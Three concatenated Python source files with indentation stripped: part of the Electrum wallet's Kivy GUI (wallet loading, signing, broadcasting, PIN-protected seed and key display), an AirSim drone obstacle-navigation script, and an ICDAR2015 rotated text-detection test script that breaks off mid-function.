Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
'''Initialize the UX part of Electrum. This function performs the basic
tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet.has_password() and now - self.pause_time > 60:  # call the method; the bound method object itself is always truthy
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error message bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an info message bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an information bubble.
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
img_nav.py
|
import setup_path
import airsim
import numpy as np
import os
import tempfile
import pprint
import cv2
import math
import time
import threading
from PIL import Image
import random
# Camera details should match settings.json
IMAGE_HEIGHT = 144
IMAGE_WIDTH = 256
CENTER = (IMAGE_HEIGHT //2, IMAGE_WIDTH//2)
FOV = 90
# TODO: Vertical FOV rounds down for generating random integers. Some pictures will not be created
VERT_FOV = FOV * IMAGE_HEIGHT // IMAGE_WIDTH
OBS_LEN = 2.2 # Obstacle diameter in meters
NUM_OBS = 6 # The number of obstacles in the course
VEL = 0.1 # Target velocity along the LOS vector
'''
# Ground truth depth function
def getDepth(h,w):
received = client.simGetObjectPose("Obstacle1")
obs_pos = np.array([received.position.x_val, received.position.y_val, received.position.z_val]) # Global coordinates of the obstacle
received = client.simGetVehiclePose()
drone_pos = np.array([received.position.x_val, received.position.y_val, received.position.z_val]) # Global coordinates of the drone
return np.linalg.norm(obs_pos - drone_pos)
'''
def getDepth(h,w):
# Constants calibrated from image_calibrator.py
# 8.89922094 0.0304452 13.7360959 0.02951979 0.10829337
return 8.89922094 * np.exp(-0.0304452 * h) + 13.7360959 * np.exp(-0.02951979 * w) + 0.10829337
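# Rough sanity check of the calibrated model above (values approximate): for a
# bounding box of h=50, w=100 pixels,
#   getDepth(50, 100) ≈ 8.899*exp(-1.522) + 13.736*exp(-2.952) + 0.108 ≈ 1.94 + 0.72 + 0.11 ≈ 2.77 m,
# i.e. the larger the box appears in the image, the smaller the estimated distance.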
def cartesianToPolar(x,y,z):
return [
np.sqrt(x**2 + y**2 + z**2),
np.arctan2(y, x),
np.arctan2(np.sqrt(x**2 + y**2), z)]
def polarToCartesian(r, theta, phi):
return [
r * math.sin(theta) * math.cos(phi),
r * math.sin(theta) * math.sin(phi),
r * math.cos(theta)]
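# Convention used by the two helpers above: theta is the polar angle measured from the
# +z axis and phi is the azimuth in the x-y plane, so polarToCartesian(1, math.pi/2, 0)
# returns the unit x vector [1, 0, 0]; cartesianToPolar returns [r, azimuth, polar angle]
# in that order.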
def normalize(v):
norm = np.linalg.norm(v)
if norm == 0:
return v
return v / norm
def printImage(image):
mask = np.full_like(image, 255)
for i in range(len(image)):
for j in range(len(image[i])):
if np.array_equal(image[i][j], [0,0,0]):
mask[i][j] = [0,0,0]
im = Image.fromarray(mask)
im.show()
def getBoundBox():
responses = client.simGetImages([
#airsim.ImageRequest("0", airsim.ImageType.DepthVis),
#airsim.ImageRequest("0", airsim.ImageType.DepthPerspective, True),
airsim.ImageRequest("0", airsim.ImageType.Segmentation, False, False),
#airsim.ImageRequest("0", airsim.ImageType.Scene, False, False),
#airsim.ImageRequest("0", airsim.ImageType.DisparityNormalized),
#airsim.ImageRequest("0", airsim.ImageType.SurfaceNormals)
])
response = responses[0]
img1d = np.frombuffer(response.image_data_uint8, dtype=np.uint8) # get numpy array (np.fromstring is deprecated for binary data)
img_bgr = img1d.reshape(response.height, response.width, 3) #reshape array to 3 channel image array H X W X 3
#img_bgr = np.flipud(img_bgr) #original image is fliped vertically
image = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2RGB) # Change from Airsim's BGR to an RGB image
x = threading.Thread(target=printImage, args=(image,), daemon=True)
x.start()
u = -1 # Highest point of the obstacle
b = -1 # Lowest point of the obstacle
for i in range(len(image)):
for j in range(len(image[i])):
if np.array_equal(image[i][j], [0,0,0]):
if u == -1:
u = i
b = i
l = -1 # Leftmost point of the obstacle
r = -1 # Rightmost point of the obstacle
for j in range(len(image[0])):
for i in range(len(image)):
if np.array_equal(image[i][j], [0,0,0]):
if l == -1:
l = j
r = j
i = u + (b-u)//2
j = l + (r-l)//2
return ([i,j] , [u,b,l,r])
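# getBoundBox() scans the segmentation image twice: rows top-to-bottom for the highest
# and lowest black pixels (u, b), then columns left-to-right for the left/right extent
# (l, r), and returns the box centre [i, j] together with the bounds [u, b, l, r].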
#TODO: Drone navigates to the right side of the obstacle regardless of starting position. Corrections to the trajectory occur but happen too late
# Generate offsets for the drone's starting position
x = random.randint(-50,-40)
y = random.randint(-10,10)
z = random.randint(-10,10)
# connect to the AirSim simulator
client = airsim.MultirotorClient()
client.confirmConnection()
client.enableApiControl(True)
if client.simSetSegmentationObjectID("Obstacle[\w]*", 0, True):
print("Segmentation color set to black")
else:
print("Segmentation color specification failed")
print("Setting up the drone for flight...")
received = client.simGetObjectPose("Obstacle1")
last_obs_pos = np.array([received.position.x_val, received.position.y_val, received.position.z_val]) # Global coordinates of the obstacle
client.armDisarm(True)
client.takeoffAsync().join()
# Move the drone to a starting position nearby the first obstacle
client.moveToPositionAsync(last_obs_pos[0]+x, last_obs_pos[1]+y, last_obs_pos[2]+z, 1).join()
# client.rotateToYawAsync(0, timeout_sec=3e+38, margin=2).join() # Rotate yaw to face forward
tm = time.time()
while True:
center, bounds = getBoundBox() # The coordinates for the bounding box of the obstacle
print("center: ", center)
print("size: ", [bounds[1] - bounds[0], bounds[3] - bounds[2]])
depth = getDepth(bounds[1] - bounds[0], bounds[3] - bounds[2]) # Estimated distance to the obstacle in meters
print("depth: ", depth)
pixel_size = OBS_LEN / max(bounds[1] - bounds[0], bounds[3] - bounds[2]) # meters per pixel on the surface of the sphere of radius 'depth', obtained by comparing the known obstacle size (OBS_LEN) to the number of pixels it spans
yaw_angle = (center[1] - CENTER[1]) * pixel_size / depth # yaw angle from the camera center to the center of the obstacle, calculated using the arc length formula
pitch_angle = (center[0] - CENTER[0]) * pixel_size / depth # pitch angle from the camera center to the center of the obstacle, calculated using the arc length formula
print("angles: ", yaw_angle,pitch_angle)
vector = polarToCartesian(1, pitch_angle + 0.5 * math.pi, -1 * yaw_angle) # Unit LOS Vector, defined in the Cartesian axis relative to the drone
'''
# TODO(optional): Test quaternion math (BodyFrame works)
received = client.simGetVehiclePose() # TODO: Simulation specific API. Replace with Kinematics orientation estimation and/or GPS position
# drone_pos = np.array([received.position.x_val, received.position.y_val, received.position.z_val]) # Global coordinates of the drone
drone_or = np.array([received.orientation.w_val, received.orientation.x_val, received.orientation.y_val, received.orientation.z_val]) # Global quaternion on the drone
# q^{-1} = [q0/||q||, -q1/||q||, -q2/||q||, -q3/||q||]
drone_or_inv = [drone_or[0]/(drone_or[0]**2 + drone_or[1]**2 + drone_or[2]**2 + drone_or[3]**2), -drone_or[1]/(drone_or[0]**2 + drone_or[1]**2 + drone_or[2]**2 + drone_or[3]**2), -drone_or[2]/(drone_or[0]**2 + drone_or[1]**2 + drone_or[2]**2 + drone_or[3]**2), -drone_or[3]/(drone_or[0]**2 + drone_or[1]**2 + drone_or[2]**2 + drone_or[3]**2)] # Inverse quaternion of drone's orientation used to convert from Bodyframe to Worldframe
# v' = v + 2 * r x (s * v + r x v) / m
LOS = np.array(vector) + np.cross(2 * np.array(drone_or_inv[1:]), drone_or_inv[0]*np.array(vector) + np.cross(np.array(drone_or_inv[1:]), np.array(vector))) / (drone_or_inv[0]**2 + drone_or_inv[1]**2 + drone_or_inv[2]**2 + drone_or_inv[3]**2) # Image of LOS vector under inverse quaternion
print(LOS)
'''
# velocity is proportional to the estimated distance from the object
velocity = VEL*max(depth, 0.25)
print("Velocity: ", velocity)
print("Processing time: ", time.time() - tm)
client.moveByVelocityBodyFrameAsync(velocity * vector[0], -1 * velocity * vector[1], -1 * velocity * vector[2], 1)
tm = time.time()
client.reset()
client.armDisarm(False)
client.enableApiControl(False)
'''
'''
|
test_icdar2015_base.py
|
# -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import sys
import tensorflow as tf
import cv2
import numpy as np
import math
from tqdm import tqdm
import argparse
from multiprocessing import Queue, Process
from utils import tools
from libs.label_name_dict.label_dict import LabelMap
from libs.utils.draw_box_in_img import DrawBox
from libs.utils.coordinate_convert import forward_convert, backward_convert
from libs.utils import nms_rotate
from libs.utils.rotate_polygon_nms import rotate_gpu_nms
from utils.order_points import sort_corners
from dataloader.pretrained_weights.pretrain_zoo import PretrainModelZoo
def parse_args():
parser = argparse.ArgumentParser('Test ICDAR2015')
parser.add_argument('--test_dir', dest='test_dir',
help='evaluate imgs dir ',
default='/data/dataset/ICDAR2015/ch4_test_images', type=str)
parser.add_argument('--gpus', dest='gpus',
help='gpu id',
default='0,1,2,3,4,5,6,7', type=str)
parser.add_argument('--num_imgs', dest='num_imgs',
help='test image number',
default=np.inf, type=int)
parser.add_argument('--show_box', '-s', default=False,
action='store_true')
parser.add_argument('--flip_img', '-f', default=False,
action='store_true')
parser.add_argument('--multi_scale', '-ms', default=False,
action='store_true')
args = parser.parse_args()
return args
class TestICDAR2015(object):
def __init__(self, cfgs):
self.cfgs = cfgs
self.args = parse_args()
label_map = LabelMap(cfgs)
self.name_label_map, self.label_name_map = label_map.name2label(), label_map.label2name()
def worker(self, gpu_id, images, det_net, result_queue):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
# 1. preprocess img
img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not BGR
img_batch = tf.cast(img_plac, tf.float32)
pretrain_zoo = PretrainModelZoo()
if self.cfgs.NET_NAME in pretrain_zoo.pth_zoo or self.cfgs.NET_NAME in pretrain_zoo.mxnet_zoo:
img_batch = (img_batch / 255 - tf.constant(self.cfgs.PIXEL_MEAN_)) / tf.constant(self.cfgs.PIXEL_STD)
else:
img_batch = img_batch - tf.constant(self.cfgs.PIXEL_MEAN)
img_batch = tf.expand_dims(img_batch, axis=0)
detection_boxes, detection_scores, detection_category = det_net.build_whole_detection_network(
input_img_batch=img_batch,
gtboxes_batch_h=None,
gtboxes_batch_r=None,
gpu_id=0)
init_op = tf.group(
tf.global_variables_initializer(),
tf.local_variables_initializer()
)
restorer, restore_ckpt = det_net.get_restorer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(init_op)
if not restorer is None:
restorer.restore(sess, restore_ckpt)
print('restore model %d ...' % gpu_id)
for a_img in images:
raw_img = cv2.imread(a_img)
raw_h, raw_w = raw_img.shape[0], raw_img.shape[1]
det_boxes_r_all, det_scores_r_all, det_category_r_all = [], [], []
img_short_side_len_list = self.cfgs.IMG_SHORT_SIDE_LEN if isinstance(self.cfgs.IMG_SHORT_SIDE_LEN, list) else [
self.cfgs.IMG_SHORT_SIDE_LEN]
img_short_side_len_list = [img_short_side_len_list[0]] if not self.args.multi_scale else img_short_side_len_list
for short_size in img_short_side_len_list:
max_len = self.cfgs.IMG_MAX_LENGTH
if raw_h < raw_w:
new_h, new_w = short_size, min(int(short_size * float(raw_w) / raw_h), max_len)
else:
new_h, new_w = min(int(short_size * float(raw_h) / raw_w), max_len), short_size
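# Example of the resize rule above (illustrative numbers): a 720x1280 (h x w) image with
# short_size=800 and max_len=1333 gives new_h=800 and new_w=min(int(800*1280/720), 1333)=1333,
# i.e. the short side is scaled to short_size and the long side is capped at IMG_MAX_LENGTH.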
img_resize = cv2.resize(raw_img, (new_w, new_h))
resized_img, detected_boxes, detected_scores, detected_categories = \
sess.run(
[img_batch, detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: img_resize[:, :, ::-1]}
)
detected_indices = detected_scores >= self.cfgs.VIS_SCORE
detected_scores = detected_scores[detected_indices]
detected_boxes = detected_boxes[detected_indices]
detected_categories = detected_categories[detected_indices]
if detected_boxes.shape[0] == 0:
continue
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
detected_boxes = forward_convert(detected_boxes, False)
detected_boxes[:, 0::2] *= (raw_w / resized_w)
detected_boxes[:, 1::2] *= (raw_h / resized_h)
det_boxes_r_all.extend(detected_boxes)
det_scores_r_all.extend(detected_scores)
det_category_r_all.extend(detected_categories)
if self.args.flip_img:
detected_boxes, detected_scores, detected_categories = \
sess.run(
[detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: cv2.flip(img_resize, flipCode=1)[:, :, ::-1]}
)
detected_indices = detected_scores >= self.cfgs.VIS_SCORE
detected_scores = detected_scores[detected_indices]
detected_boxes = detected_boxes[detected_indices]
detected_categories = detected_categories[detected_indices]
if detected_boxes.shape[0] == 0:
continue
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
detected_boxes = forward_convert(detected_boxes, False)
detected_boxes[:, 0::2] *= (raw_w / resized_w)
detected_boxes[:, 0::2] = (raw_w - detected_boxes[:, 0::2])
detected_boxes[:, 1::2] *= (raw_h / resized_h)
det_boxes_r_all.extend(sort_corners(detected_boxes))
det_scores_r_all.extend(detected_scores)
det_category_r_all.extend(detected_categories)
detected_boxes, detected_scores, detected_categories = \
sess.run(
[detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: cv2.flip(img_resize, flipCode=0)[:, :, ::-1]}
)
detected_indices = detected_scores >= self.cfgs.VIS_SCORE
detected_scores = detected_scores[detected_indices]
detected_boxes = detected_boxes[detected_indices]
detected_categories = detected_categories[detected_indices]
if detected_boxes.shape[0] == 0:
continue
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
detected_boxes = forward_convert(detected_boxes, False)
detected_boxes[:, 0::2] *= (raw_w / resized_w)
detected_boxes[:, 1::2] *= (raw_h / resized_h)
detected_boxes[:, 1::2] = (raw_h - detected_boxes[:, 1::2])
det_boxes_r_all.extend(sort_corners(detected_boxes))
det_scores_r_all.extend(detected_scores)
det_category_r_all.extend(detected_categories)
det_boxes_r_all = np.array(det_boxes_r_all)
det_scores_r_all = np.array(det_scores_r_all)
det_category_r_all = np.array(det_category_r_all)
box_res_rotate_ = []
label_res_rotate_ = []
score_res_rotate_ = []
if det_scores_r_all.shape[0] != 0:
for sub_class in range(1, self.cfgs.CLASS_NUM + 1):
index = np.where(det_category_r_all == sub_class)[0]
if len(index) == 0:
continue
tmp_boxes_r = det_boxes_r_all[index]
tmp_label_r = det_category_r_all[index]
tmp_score_r = det_scores_r_all[index]
if self.args.multi_scale:
tmp_boxes_r_ = backward_convert(tmp_boxes_r, False)
# try:
# inx = nms_rotate.nms_rotate_cpu(boxes=np.array(tmp_boxes_r_),
# scores=np.array(tmp_score_r),
# iou_threshold=self.cfgs.NMS_IOU_THRESHOLD,
# max_output_size=5000)
# except:
tmp_boxes_r_ = np.array(tmp_boxes_r_)
tmp = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
tmp[:, 0:-1] = tmp_boxes_r_
tmp[:, -1] = np.array(tmp_score_r)
# Note: rotate_gpu_nms computes the IoU of two identical rectangles as 0, so a small random jitter is added before NMS
jitter = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
jitter[:, 0] += np.random.rand(tmp_boxes_r_.shape[0], ) / 1000
inx = rotate_gpu_nms(np.array(tmp, np.float32) + np.array(jitter, np.float32), 0.1, 0)
else:
inx = np.arange(0, tmp_score_r.shape[0])
box_res_rotate_.extend(np.array(tmp_boxes_r)[inx])
score_res_rotate_.extend(np.array(tmp_score_r)[inx])
label_res_rotate_.extend(np.array(tmp_label_r)[inx])
box_res_rotate_ = np.array(box_res_rotate_)
score_res_rotate_ = np.array(score_res_rotate_)
label_res_rotate_ = np.array(label_res_rotate_)
result_dict = {'scales': [1, 1], 'boxes': box_res_rotate_,
'scores': score_res_rotate_, 'labels': label_res_rotate_,
'image_id': a_img}
result_queue.put_nowait(result_dict)
def test_icdar2015(self, det_net, real_test_img_list, txt_name):
save_path = os.path.join('./test_icdar2015', self.cfgs.VERSION)
tools.makedirs(save_path)
nr_records = len(real_test_img_list)
pbar = tqdm(total=nr_records)
gpu_num = len(self.args.gpus.strip().split(','))
nr_image = math.ceil(nr_records / gpu_num)
result_queue = Queue(500)
procs = []
for i, gpu_id in enumerate(self.args.gpus.strip().split(',')):
start = i * nr_image
